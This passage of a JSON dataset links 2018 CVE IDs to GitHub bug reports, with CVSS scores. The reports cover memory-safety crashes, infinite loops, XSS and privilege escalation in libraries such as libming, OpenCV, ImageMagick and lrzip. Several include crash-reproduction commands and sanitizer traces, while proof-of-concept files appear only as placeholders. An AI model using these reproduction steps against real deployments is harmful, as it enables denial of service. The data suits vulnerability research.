fa fa fa fa fa Shadow byte legend (one shadow byte represents NUMBERTAG application bytes): Addressable NUMBERTAG Partially addressable NUMBERTAG Heap left redzone: fa Freed heap region: fd Stack left redzone: f1 Stack mid redzone: f2 Stack right redzone: f3 Stack after return: f5 Stack use after scope: f8 Global redzone: f9 Global init order: f6 Poisoned by user: f7 Container overflow: fc Array cookie: ac Intra object redzone: bb APITAG internal: fe Left alloca redzone: ca Right alloca redzone: cb NUMBERTAG ABORTING",
        "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H",
        "severity": "HIGH",
        "baseScore": 8.8,
        "impactScore": 5.9,
        "exploitabilityScore": 2.8
    },
    {
        "CVE_ID": "CVE-2018-5251",
        "Issue_Url_old": "https://github.com/libming/libming/issues/97",
        "Issue_Url_new": "https://github.com/libming/libming/issues/97",
        "Repo_new": "libming/libming",
        "Issue_Created_At": "2018-01-04T04:40:44Z",
        "description": "left shift of a negative value in APITAG (util/read.c). on NUMBERTAG the latest version): there is a left shift of a negative value in the APITAG function (util/read.c), which can cause denial of service via a crafted swf file. PATHTAG runtime error: shift exponent NUMBERTAG is negative To reproduce the issue, compile libming with UBSAN \" fsanitize=undefined\", then execute: listswf $POC The POC file can be downloaded from: FILETAG",
        "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
        "severity": "MEDIUM",
        "baseScore": 6.5,
        "impactScore": 3.6,
        "exploitabilityScore": 2.8
    },
    {
        "CVE_ID": "CVE-2018-5252",
        "Issue_Url_old": "https://github.com/jsummers/imageworsener/issues/34",
        "Issue_Url_new": "https://github.com/jsummers/imageworsener/issues/34",
        "Repo_new": "jsummers/imageworsener",
        "Issue_Created_At": "2018-01-04T05:58:02Z",
        "description": "infinite loop in get_raw_sample_int . APITAG version NUMBERTAG Copyright NUMBERTAG Jason Summers Features NUMBERTAG bit Uses libjpeg version NUMBERTAG d Uses libpng version NUMBERTAG Uses zlib version NUMBERTAG imagew @ MENTIONTAG /tmp/out outfmt bmp CODETAG testcase: URLTAG",
        "vectorString": "CVSS:3.0/AV:N/AC:H/PR:N/UI:R/S:U/C:N/I:N/A:H",
        "severity": "MEDIUM",
        "baseScore": 5.3,
        "impactScore": 3.6,
        "exploitabilityScore": 1.6
    },
    {
        "CVE_ID": "CVE-2018-5253",
        "Issue_Url_old": "https://github.com/axiomatic-systems/Bento4/issues/233",
        "Issue_Url_new": "https://github.com/axiomatic-systems/bento4/issues/233",
        "Repo_new": "axiomatic-systems/bento4",
        "Issue_Created_At": "2018-01-04T12:48:08Z",
        "description": "Infinite loop in APITAG MP4 To AAC File Converter Version NUMBERTAG APITAG Version NUMBERTAG c NUMBERTAG Axiomatic Systems, LLC ./mp NUMBERTAG aac @ MENTIONTAG ./out.aac ERRORTAG APITAG if size not zero Infinite loop CODETAG testcase: URLTAG",
        "vectorString": "CVSS:3.0/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H",
        "severity": "HIGH",
        "baseScore": 7.8,
        "impactScore": 5.9,
        "exploitabilityScore": 1.8
    },
    {
        "CVE_ID": "CVE-2018-5268",
        "Issue_Url_old": "https://github.com/opencv/opencv/issues/10541",
        "Issue_Url_new": "https://github.com/opencv/opencv/issues/10541",
        "Repo_new": "opencv/opencv",
        "Issue_Created_At": "2018-01-07T13:02:37Z",
        "description": "A heap based buffer overflow happens in APITAG System information (version) APITAG NUMBERTAG Operating System / Platform => Ubuntu NUMBERTAG Compiler => clang++ Compiled executable NUMBERTAG bits Detailed description A heap based buffer overflow happens in function APITAG in APITAG The crash details as follows: APITAG ERRORTAG APITAG Steps to reproduce Please refer to the following url for the testcases: URLTAG",
        "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
        "severity": "MEDIUM",
        "baseScore": 5.5,
        "impactScore": 3.6,
        "exploitabilityScore": 1.8
    },
    {
        "CVE_ID": "CVE-2018-5269",
        "Issue_Url_old": "https://github.com/opencv/opencv/issues/10540",
        "Issue_Url_new": "https://github.com/opencv/opencv/issues/10540",
        "Repo_new": "opencv/opencv",
        "Issue_Created_At": "2018-01-07T12:58:35Z",
        "description": "Assertion failure happens in bitstrm.cpp because of an incorrect integer cast. System information (version) APITAG NUMBERTAG Operating System / Platform => Ubuntu NUMBERTAG Compiler => clang++ Compiled executable NUMBERTAG bits Detailed description An assertion failure is triggered when parsing crafted image file in function APITAG in file APITAG This Assertion failure happens because an incorrect cast from a NUMBERTAG bit integer to NUMBERTAG bit integer. The crash details as follows: APITAG opencv_afl test: PATHTAG void APITAG Assertion APITAG && pos NUMBERTAG failed. Aborted (core dumped) APITAG Steps to reproduce Please refer to the following url for the testcases: URLTAG",
        "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
        "severity": "MEDIUM",
        "baseScore": 5.5,
        "impactScore": 3.6,
        "exploitabilityScore": 1.8
    },
    {
        "CVE_ID": "CVE-2018-5294",
        "Issue_Url_old": "https://github.com/libming/libming/issues/98",
        "Issue_Url_new": "https://github.com/libming/libming/issues/98",
        "Repo_new": "libming/libming",
        "Issue_Created_At": "2018-01-05T20:26:52Z",
        "description": "integer overflow caused by out of range left shift in APITAG (util/read.c). on NUMBERTAG the latest version): there is a out of range left shift in the APITAG function (util/read.c), which can cause denial of service via a crafted swf file. PATHTAG runtime error: left shift of NUMBERTAG by NUMBERTAG places cannot be represented in type 'int' To reproduce the issue, compile libming with UBSAN \" fsanitize=undefined\", then execute: listswf $POC The POC file can be downloaded from: FILETAG",
        "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
        "severity": "MEDIUM",
        "baseScore": 6.5,
        "impactScore": 3.6,
        "exploitabilityScore": 2.8
    },
    {
        "CVE_ID": "CVE-2018-5357",
        "Issue_Url_old": "https://github.com/ImageMagick/ImageMagick/issues/941",
        "Issue_Url_new": "https://github.com/imagemagick/imagemagick/issues/941",
        "Repo_new": "imagemagick/imagemagick",
        "Issue_Created_At": "2018-01-11T02:55:39Z",
        "description": "memory leaks. ubuntu APITAG magick version Version: APITAG NUMBERTAG Q NUMBERTAG FILETAG Copyright NUMBERTAG APITAG Studio LLC License: FILETAG Features: Cipher DPC HDRI Delegates (built in): fontconfig freetype png x zlib ubuntu APITAG magick convert poc /dev/null convert: unable to open image PATHTAG No such file or directory @ PATHTAG convert: no images defined PATHTAG @ PATHTAG APITAG NUMBERTAG ERROR: APITAG detected memory leaks Direct leak of NUMBERTAG byte(s) in NUMBERTAG object(s) allocated from NUMBERTAG b9ad3 in malloc ( PATHTAG NUMBERTAG f NUMBERTAG be NUMBERTAG ea NUMBERTAG in APITAG PATHTAG NUMBERTAG f NUMBERTAG be2ccd NUMBERTAG in APITAG PATHTAG NUMBERTAG f NUMBERTAG be2cf NUMBERTAG in APITAG PATHTAG NUMBERTAG f NUMBERTAG bda NUMBERTAG c in APITAG PATHTAG NUMBERTAG f NUMBERTAG bdbaeefd in APITAG PATHTAG NUMBERTAG e4ce7 in APITAG PATHTAG NUMBERTAG e4ce7 in main PATHTAG NUMBERTAG f NUMBERTAG bb9eef NUMBERTAG in __libc_start_main PATHTAG SUMMARY: APITAG NUMBERTAG byte(s) leaked in NUMBERTAG allocation(s). FILETAG",
        "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
        "severity": "MEDIUM",
        "baseScore": 6.5,
        "impactScore": 3.6,
        "exploitabilityScore": 2.8
    },
    {
        "CVE_ID": "CVE-2018-5358",
        "Issue_Url_old": "https://github.com/ImageMagick/ImageMagick/issues/939",
        "Issue_Url_new": "https://github.com/imagemagick/imagemagick/issues/939",
        "Repo_new": "imagemagick/imagemagick",
        "Issue_Created_At": "2018-01-11T02:01:40Z",
        "description": "memory leaks. ubuntu APITAG magick version Version: APITAG NUMBERTAG Q NUMBERTAG FILETAG Copyright NUMBERTAG APITAG Studio LLC License: FILETAG Features: Cipher DPC HDRI Delegates (built in): fontconfig freetype png x zlib ubuntu APITAG magick montage json.psd FILETAG APITAG NUMBERTAG ERROR: APITAG detected memory leaks Direct leak of NUMBERTAG byte(s) in NUMBERTAG object(s) allocated from NUMBERTAG b9ad3 in malloc ( PATHTAG NUMBERTAG f6d NUMBERTAG fb6fd in APITAG PATHTAG NUMBERTAG f6d NUMBERTAG ff NUMBERTAG c in APITAG PATHTAG NUMBERTAG f6d NUMBERTAG e5d NUMBERTAG in APITAG PATHTAG NUMBERTAG f6d NUMBERTAG e NUMBERTAG c6f in APITAG PATHTAG NUMBERTAG f6d NUMBERTAG acd NUMBERTAG in APITAG PATHTAG NUMBERTAG f6d NUMBERTAG da NUMBERTAG b1 in APITAG PATHTAG NUMBERTAG f6d NUMBERTAG da NUMBERTAG d in APITAG PATHTAG NUMBERTAG f6d NUMBERTAG b NUMBERTAG d1 in APITAG PATHTAG NUMBERTAG f6d NUMBERTAG b NUMBERTAG b in APITAG PATHTAG NUMBERTAG f6d NUMBERTAG dc5c in APITAG PATHTAG NUMBERTAG f6d NUMBERTAG eefd in APITAG PATHTAG NUMBERTAG e4ce7 in APITAG PATHTAG NUMBERTAG e4ce7 in main PATHTAG NUMBERTAG f6d NUMBERTAG fcef NUMBERTAG in __libc_start_main PATHTAG FILETAG",
        "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
        "severity": "MEDIUM",
        "baseScore": 6.5,
        "impactScore": 3.6,
        "exploitabilityScore": 2.8
    },
    {
        "CVE_ID": "CVE-2018-5650",
        "Issue_Url_old": "https://github.com/ckolivas/lrzip/issues/88",
        "Issue_Url_new": "https://github.com/ckolivas/lrzip/issues/88",
        "Repo_new": "ckolivas/lrzip",
        "Issue_Created_At": "2018-01-12T15:44:59Z",
        "description": "Infinite Loop Vulnerability in unzip_match function (src/runzip.c). on NUMBERTAG the latest version): there is an infinite loop and application hang in the unzip_match function (src/runzip.c), which can be triggered by the POC with command lrzip t $POC Looking into the unzip_match function (src/runzip.c), we found that in the while loop (line NUMBERTAG the \"offset\" could be manipulated by a crafted lrz file (line NUMBERTAG When offset is set to zero, n will always be zero (line NUMBERTAG which in turn causes len always be non zero, the infinite loop occurs. The code segment is NUMBERTAG static i NUMBERTAG read_fdhist(rzip_control control, void buf, i NUMBERTAG len NUMBERTAG offset = read_vchars(control, ss NUMBERTAG chunk_bytes NUMBERTAG while (len NUMBERTAG n = MIN(len, offset NUMBERTAG len = n NUMBERTAG off_buf += n NUMBERTAG total += n NUMBERTAG POC: FILETAG The gdb backtrack is as follows: (gdb) bt NUMBERTAG in md5_process_bytes NUMBERTAG e NUMBERTAG in unzip_match NUMBERTAG ae4 in runzip_chunk NUMBERTAG a3 in runzip_fd NUMBERTAG in decompress_file NUMBERTAG d0f4 in main ()",
        "vectorString": "CVSS:3.0/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
        "severity": "MEDIUM",
        "baseScore": 5.5,
        "impactScore": 3.6,
        "exploitabilityScore": 1.8
    },
    {
        "CVE_ID": "CVE-2018-5698",
        "Issue_Url_old": "https://github.com/WizardMac/ReadStat/issues/108",
        "Issue_Url_new": "https://github.com/wizardmac/readstat/issues/108",
        "Repo_new": "wizardmac/readstat",
        "Issue_Created_At": "2018-01-11T02:48:57Z",
        "description": "Heap overflow in APITAG APITAG version NUMBERTAG prerelease Ubuntu NUMBERTAG git log CODETAG ./readstat ./heap buffer overflow.dta NUMBERTAG sav ERRORTAG",
        "vectorString": "CVSS:3.0/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H",
        "severity": "HIGH",
        "baseScore": 7.8,
        "impactScore": 5.9,
        "exploitabilityScore": 1.8
    },
    {
        "CVE_ID": "CVE-2018-5706",
        "Issue_Url_old": "https://github.com/OctopusDeploy/Issues/issues/4167",
        "Issue_Url_new": "https://github.com/octopusdeploy/issues/issues/4167",
        "Repo_new": "octopusdeploy/issues",
        "Issue_Created_At": "2018-01-16T01:34:00Z",
        "description": "Block team editing when the user tries to escalate privileges. A user with APITAG permissions, but not Administer System permissions can edit a team to add the System Administrator role to their team add themselves to the System Administrator team Also a user with APITAG permissions, but not Administer System permissions can edit their own user roles to include Administer System.",
        "vectorString": "CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H",
        "severity": "HIGH",
        "baseScore": 8.8,
        "impactScore": 5.9,
        "exploitabilityScore": 2.8
    },
    {
        "CVE_ID": "CVE-2018-5727",
        "Issue_Url_old": "https://github.com/uclouvain/openjpeg/issues/1053",
        "Issue_Url_new": "https://github.com/uclouvain/openjpeg/issues/1053",
        "Repo_new": "uclouvain/openjpeg",
        "Issue_Created_At": "2018-01-13T05:29:20Z",
        "description": "Integer overflow in opj_t1_encode_cblks ( PATHTAG ). APITAG problem is discovered when UBSAN is enabled) on openjpeg NUMBERTAG latest version): there is a integer overflow in the opj_t1_encode_cblks function ( PATHTAG ), which could be triggered by the POC. POC address: FILETAG Command: opj_compress n NUMBERTAG i $POC o /tmp/null.j2k PATHTAG runtime error: signed integer overflow NUMBERTAG cannot be represented in type 'int'",
        "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
        "severity": "MEDIUM",
        "baseScore": 6.5,
        "impactScore": 3.6,
        "exploitabilityScore": 2.8
    },
    {
        "CVE_ID": "CVE-2018-5747",
        "Issue_Url_old": "https://github.com/ckolivas/lrzip/issues/90",
        "Issue_Url_new": "https://github.com/ckolivas/lrzip/issues/90",
        "Repo_new": "ckolivas/lrzip",
        "Issue_Created_At": "2018-01-17T16:11:56Z",
        "description": "use after free in ucompthread (src/stream.c). on NUMBERTAG the latest version) and the latest master branch: there is a use after free problem in the ucompthread function (src/stream.c) that causes the program to crash, which can be triggered by the POC with command lrzip t $POC POC: FILETAG The problem happens in line NUMBERTAG of stream.c file. Once \"ucthread\" is released, \"uci\" is related with a random address, which causes segmentation fault NUMBERTAG uci = &ucthread[i NUMBERTAG retry NUMBERTAG if (uci >c_type != CTYPE_NONE NUMBERTAG switch (uci >c_type NUMBERTAG case CTYPE_LZMA: PATHTAG t PATHTAG Decompressing... ASAN:SIGSEGV APITAG while reporting a bug found another one. Ignoring. ASAN:SIGSEGV APITAG while reporting a bug found another one. Ignoring. chunk_bytes NUMBERTAG is invalid in runzip_chunk Fatal error exiting APITAG ASAN:SIGSEG NUMBERTAG ERROR: APITAG heap use after free on address NUMBERTAG d NUMBERTAG ebc0 at pc NUMBERTAG e NUMBERTAG bp NUMBERTAG fdc NUMBERTAG f9d NUMBERTAG sp NUMBERTAG fdc NUMBERTAG f9d NUMBERTAG ASAN:SIGSEGV APITAG while reporting a bug found another one. Ignoring. APITAG while reporting a bug found another one. Ignoring. READ of size NUMBERTAG at NUMBERTAG d NUMBERTAG ebc0 thread T NUMBERTAG e NUMBERTAG in ucompthread PATHTAG NUMBERTAG fdc8a NUMBERTAG ce NUMBERTAG in start_thread APITAG NUMBERTAG fdc NUMBERTAG a NUMBERTAG c in __clone APITAG NUMBERTAG d NUMBERTAG ebc0 is located NUMBERTAG bytes inside of NUMBERTAG byte region APITAG freed by thread T0 here NUMBERTAG fdc8ae NUMBERTAG e NUMBERTAG in __interceptor_free PATHTAG NUMBERTAG in close_stream_in PATHTAG previously allocated by thread T0 here NUMBERTAG fdc8ae NUMBERTAG in __interceptor_calloc PATHTAG NUMBERTAG d in open_stream_in PATHTAG Thread T7 created by T0 here NUMBERTAG fdc8ae NUMBERTAG b4 in __interceptor_pthread_create PATHTAG NUMBERTAG e5cc in create_pthread PATHTAG SUMMARY: APITAG heap use after free PATHTAG ucompthread Shadow bytes around the buggy address NUMBERTAG c3a7fffbd NUMBERTAG fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa NUMBERTAG c3a7fffbd NUMBERTAG fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa NUMBERTAG c3a7fffbd NUMBERTAG fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa NUMBERTAG c3a7fffbd NUMBERTAG fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd NUMBERTAG c3a7fffbd NUMBERTAG fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd NUMBERTAG c3a7fffbd NUMBERTAG fd fd fd fd fd fd fd fd[fd]fd fd fd fd fd fd fd NUMBERTAG c3a7fffbd NUMBERTAG fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd NUMBERTAG c3a7fffbd NUMBERTAG fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd NUMBERTAG c3a7fffbda0: fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd NUMBERTAG c3a7fffbdb0: fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd NUMBERTAG c3a7fffbdc0: fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd Shadow byte legend (one shadow byte represents NUMBERTAG application bytes): Addressable NUMBERTAG Partially addressable NUMBERTAG Heap left redzone: fa Heap right redzone: fb Freed heap region: fd Stack left redzone: f1 Stack mid redzone: f2 Stack right redzone: f3 Stack partial redzone: f4 Stack after return: f5 Stack use after scope: f8 Global redzone: f9 Global init order: f6 Poisoned by user: f7 Container overflow: fc Array cookie: ac Intra object redzone: bb APITAG internal: fe NUMBERTAG ABORTING APITAG",
        "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
        "severity": "MEDIUM",
        "baseScore": 5.5,
        "impactScore": 3.6,
        "exploitabilityScore": 1.8
    },
    {
        "CVE_ID": "CVE-2018-5772",
        "Issue_Url_old": "https://github.com/Exiv2/exiv2/issues/216",
        "Issue_Url_new": "https://github.com/exiv2/exiv2/issues/216",
        "Repo_new": "exiv2/exiv2",
        "Issue_Created_At": "2018-01-18T05:42:05Z",
        "description": "Segmentation fault caused by uncontrolled recursion of APITAG APITAG On latest version of exi NUMBERTAG and the latest master branch: there is a segmentation fault caused by uncontrolled recursion of APITAG function in src/image.cpp file, which could cause a denial of service via a crafted tif file. This issue could be reproduced by command: exi NUMBERTAG POC. POC is available at: FILETAG The stack trace is as follows: APITAG of APITAG call... at PATHTAG NUMBERTAG ffff7b9d6c2 in APITAG (this NUMBERTAG b0, io=..., out=..., APITAG start NUMBERTAG APITAG c NUMBERTAG M', depth NUMBERTAG at PATHTAG NUMBERTAG ffff7b9d6c2 in APITAG (this NUMBERTAG b0, io=..., out=..., APITAG start NUMBERTAG APITAG c NUMBERTAG M', depth NUMBERTAG at PATHTAG NUMBERTAG ffff7b9d6c2 in APITAG (this NUMBERTAG b0, io=..., out=..., APITAG start NUMBERTAG APITAG c NUMBERTAG M', depth NUMBERTAG at PATHTAG NUMBERTAG ffff7b9df NUMBERTAG in APITAG (this NUMBERTAG b0, io=..., out=..., APITAG depth NUMBERTAG offset NUMBERTAG at PATHTAG NUMBERTAG ffff7be NUMBERTAG b in APITAG (this NUMBERTAG b0, out=..., APITAG depth NUMBERTAG at PATHTAG NUMBERTAG ffff7be NUMBERTAG in APITAG (this NUMBERTAG b0) at PATHTAG NUMBERTAG adde in APITAG (this NUMBERTAG at PATHTAG NUMBERTAG a9b3 in APITAG (this NUMBERTAG path=...) at PATHTAG NUMBERTAG bfb9 in main (argc NUMBERTAG arg NUMBERTAG fffffffdd NUMBERTAG at PATHTAG",
        "vectorString": "CVSS:3.0/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
        "severity": "MEDIUM",
        "baseScore": 5.5,
        "impactScore": 3.6,
        "exploitabilityScore": 1.8
    },
    {
        "CVE_ID": "CVE-2018-5773",
        "Issue_Url_old": "https://github.com/trentm/python-markdown2/issues/285",
        "Issue_Url_new": "https://github.com/trentm/python-markdown2/issues/285",
        "Repo_new": "trentm/python-markdown2",
        "Issue_Created_At": "2018-01-18T06:06:04Z",
        "description": "Possible XSS in safe_mode using incomplete tags. APITAG with latest version: ERRORTAG using APITAG : ERRORTAG I think it will be a better approach to encode the incomplete tags as well to prevent it. URLTAG",
        "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N",
        "severity": "MEDIUM",
        "baseScore": 6.1,
        "impactScore": 2.7,
        "exploitabilityScore": 2.8
    },
    {
        "CVE_ID": "CVE-2018-5773",
        "Issue_Url_old": "https://github.com/google/osv/issues/430",
        "Issue_Url_new": "https://github.com/google/osv.dev/issues/430",
        "Repo_new": "google/osv.dev",
        "Issue_Created_At": "2022-05-18T14:37:27Z",
        "description": "APITAG Data quality issue for APITAG . MENTIONTAG reported this upstream to APITAG : APITAG Produces: CODETAG But APITAG isn't valid for APITAG (it's only valid for APITAG ): URLTAG It looks like OSV has both APITAG and its CVE alias, but with a missing \"version fixed\" for the GHSA version: URLTAG cc MENTIONTAG as well for visibility.",
        "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N",
        "severity": "MEDIUM",
        "baseScore": 6.1,
        "impactScore": 2.7,
        "exploitabilityScore": 2.8
    },
    {
        "CVE_ID": "CVE-2018-5785",
        "Issue_Url_old": "https://github.com/uclouvain/openjpeg/issues/1057",
        "Issue_Url_new": "https://github.com/uclouvain/openjpeg/issues/1057",
        "Repo_new": "uclouvain/openjpeg",
        "Issue_Created_At": "2018-01-19T02:36:38Z",
        "description": "Out of bound left shift in opj_j2k_setup_encoder ( PATHTAG ). APITAG problem is discovered with UBSAN enabled) On latest version NUMBERTAG and master branch of openjpeg: there is an integer overflow caused by out of bound left shift in opj_j2k_setup_encoder function ( PATHTAG ), which could cause denial of service via a crafted bmp file. PATHTAG runtime error: shift exponent NUMBERTAG is too large for NUMBERTAG bit type 'int' To reproduce this issue, run: bin/opj_compress n NUMBERTAG i $POC o OUTPUT The POC could be downloaded at: FILETAG",
        "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
        "severity": "MEDIUM",
        "baseScore": 6.5,
        "impactScore": 3.6,
        "exploitabilityScore": 2.8
    },
    {
        "CVE_ID": "CVE-2018-5786",
        "Issue_Url_old": "https://github.com/ckolivas/lrzip/issues/91",
        "Issue_Url_new": "https://github.com/ckolivas/lrzip/issues/91",
        "Repo_new": "ckolivas/lrzip",
        "Issue_Created_At": "2018-01-19T05:20:03Z",
        "description": "Infinite Loop Vulnerability in get_fileinfo (src/lrzip.c). On latest version NUMBERTAG and the master branch, there is an infinite loop and application hang in the get_fileinfo function (src/lrzip.c), which can be triggered by the POC with command: lrzip i $POC Looking into the get_fileinfo function (src/lrzip.c), we found that: in the \"do {} while(last_head)\" loop, the \"last_head\" variable is affected by the POC file and always non zero, and \"lseek\" in line NUMBERTAG continuously moves file cursor to the same position. That means, \"last_head\" is always assigned the value from the same file position, resulting in infinite loop NUMBERTAG bool get_fileinfo(rzip_control control NUMBERTAG do NUMBERTAG if (unlikely(head_off = lseek(fd_in, last_head + ofs, SEEK_SET NUMBERTAG APITAG to seek to header data in get_fileinfo \"), error NUMBERTAG if APITAG fd_in, &ctype, &c_len, &u_len NUMBERTAG last_head, chunk_byte NUMBERTAG return false NUMBERTAG while (last_head); POC: FILETAG",
        "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
        "severity": "MEDIUM",
        "baseScore": 5.5,
        "impactScore": 3.6,
        "exploitabilityScore": 1.8
    },
    {
        "CVE_ID": "CVE-2018-5968",
        "Issue_Url_old": "https://github.com/FasterXML/jackson-databind/issues/1899",
        "Issue_Url_new": "https://github.com/fasterxml/jackson-databind/issues/1899",
        "Repo_new": "fasterxml/jackson-databind",
        "Issue_Created_At": "2018-01-18T11:24:26Z",
        "description": "Another two gadgets to exploit default typing issue in jackson. Hi, there. Recently, I found that there are two new gadgets can be used to exploit jackson which can cause RCE vulnerability. I had sent the report to APITAG . Cheers!",
        "vectorString": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H",
        "severity": "HIGH",
        "baseScore": 8.1,
        "impactScore": 5.9,
        "exploitabilityScore": 2.2
    },
    {
        "CVE_ID": "CVE-2018-6010",
        "Issue_Url_old": "https://github.com/yiisoft/yii2/issues/14711",
        "Issue_Url_new": "https://github.com/yiisoft/yii2/issues/14711",
        "Repo_new": "yiisoft/yii2",
        "Issue_Created_At": "2017-08-23T16:09:01Z",
        "description": "Exceptions on AJAX requests display sensitive information. What steps will reproduce the problem? Throw an exception anywhere in your code, make sure that APITAG is off and that you do not have a custom error action ( ERRORTAG ) configured: ERRORTAG Now make an AJAX request to the page that throws the exception and make sure that the response format is set to APITAG . What is the expected result? Response text: ERRORTAG What do you get instead? Response text: ERRORTAG Additional info | Q | A | | | Yii version NUMBERTAG PHP version NUMBERTAG Operating system | Linux I haven't had a chance to test this with the newest Yii2 version but checked the code inside ERRORTAG quickly and it looks like it will lead to the same problem.",
        "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N",
        "severity": "HIGH",
        "baseScore": 7.5,
        "impactScore": 3.6,
        "exploitabilityScore": 3.9
    },
    {
        "CVE_ID": "CVE-2018-6193",
        "Issue_Url_old": "https://github.com/sshipway/routers2/issues/1",
        "Issue_Url_new": "https://github.com/sshipway/routers2/issues/1",
        "Repo_new": "sshipway/routers2",
        "Issue_Created_At": "2018-01-18T21:49:55Z",
        "description": "XSS rtr param. During a security test I found that routers2.cgi has a Cross Site Scripting (XSS) vulnerability, affecting the rtr GET parameter in the request below. This may enable attackers to inject malicious scripts into client browser. APITAG XSS Evidence NUMBERTAG FILETAG \"XSS Evidence NUMBERTAG SS Evidence NUMBERTAG FILETAG \"XSS Evidence NUMBERTAG Cause: [ APITAG URLTAG All the params returned in the HTML should be escaped.",
        "vectorString": "CVSS:3.0/AV:N/AC:H/PR:N/UI:R/S:C/C:L/I:L/A:N",
        "severity": "MEDIUM",
        "baseScore": 4.7,
        "impactScore": 2.7,
        "exploitabilityScore": 1.6
    },
    {
        "CVE_ID": "CVE-2018-6196",
        "Issue_Url_old": "https://github.com/tats/w3m/issues/88",
        "Issue_Url_new": "https://github.com/tats/w3m/issues/88",
        "Repo_new": "tats/w3m",
        "Issue_Created_At": "2017-01-22T05:16:33Z",
        "description": "infinite recursion in APITAG input ( APITAG ) CODETAG how to reproduce: APITAG",
        "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
        "severity": "HIGH",
        "baseScore": 7.5,
        "impactScore": 3.6,
        "exploitabilityScore": 3.9
    },
    {
        "CVE_ID": "CVE-2018-6197",
        "Issue_Url_old": "https://github.com/tats/w3m/issues/89",
        "Issue_Url_new": "https://github.com/tats/w3m/issues/89",
        "Repo_new": "tats/w3m",
        "Issue_Created_At": "2017-02-14T04:58:05Z",
        "description": "segv in APITAG input ( APITAG ) CODETAG how to reproduce: ERRORTAG stderr: ERRORTAG More detail to reproduce please see URLTAG For your convenience, gdbline: APITAG gdb args ./w3m APITAG T text/html dump cases/tats w3m NUMBERTAG found by afl fuzz",
        "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
        "severity": "HIGH",
        "baseScore": 7.5,
        "impactScore": 3.6,
        "exploitabilityScore": 3.9
    },
    {
        "CVE_ID": "CVE-2018-6307",
        "Issue_Url_old": "https://github.com/LibVNC/libvncserver/issues/241",
        "Issue_Url_new": "https://github.com/libvnc/libvncserver/issues/241",
        "Repo_new": "libvnc/libvncserver",
        "Issue_Created_At": "2018-08-14T15:11:45Z",
        "description": "SECURITY: Heap use after free in tightvnc filetransfer extension. Since security issues have been already reported to this repository and I didn't manage to find any other information about reporting vulnerabilities, I feel that it is okay to report this issue here. In PATHTAG function APITAG contains the following code : ERRORTAG This vulnerability requires tight file transfer extesion to be enabled. APITAG function calls APITAG extension destructor routine which APITAG extension data, in this case APITAG rtcp variable. rtcp is later used as argument to ERRORTAG function, which results use after free. Asan report: ERRORTAG This security issue is a result of my work at Kaspersky Lab ICS CERT Vulnerability Research Group at position of Security Researcher. For more information about ICS CERT please contact: ics EMAILTAG FILETAG Best regards, Pavel Cheremushkin",
        "vectorString": "CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H",
        "severity": "HIGH",
        "baseScore": 8.1,
        "impactScore": 5.9,
        "exploitabilityScore": 2.2
    },
    {
        "CVE_ID": "CVE-2018-6315",
        "Issue_Url_old": "https://github.com/libming/libming/issues/101",
        "Issue_Url_new": "https://github.com/libming/libming/issues/101",
        "Repo_new": "libming/libming",
        "Issue_Created_At": "2018-01-12T00:48:40Z",
        "description": "NULL pointer dereference in APITAG . Hello. I found a NULL pointer dereference in libming. Please confirm. Thanks. Summary: NULL pointer dereference OS: APITAG NUMBERTAG bit Version: APITAG APITAG Download: FILETAG Steps to reproduce: APITAG the .POC files. APITAG the source code with APITAG APITAG the following command : swftocxx $FILE out ERRORTAG ========== APITAG This work was supported by ICT R&D program of MSIP/IITP. [R NUMBERTAG Innovation hub for high Performance Computing]",
        "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H",
        "severity": "HIGH",
        "baseScore": 8.8,
        "impactScore": 5.9,
        "exploitabilityScore": 2.8
    },
    {
        "CVE_ID": "CVE-2018-6353",
        "Issue_Url_old": "https://github.com/spesmilo/electrum/issues/3678",
        "Issue_Url_new": "https://github.com/spesmilo/electrum/issues/3678",
        "Repo_new": "spesmilo/electrum",
        "Issue_Created_At": "2018-01-09T02:56:47Z",
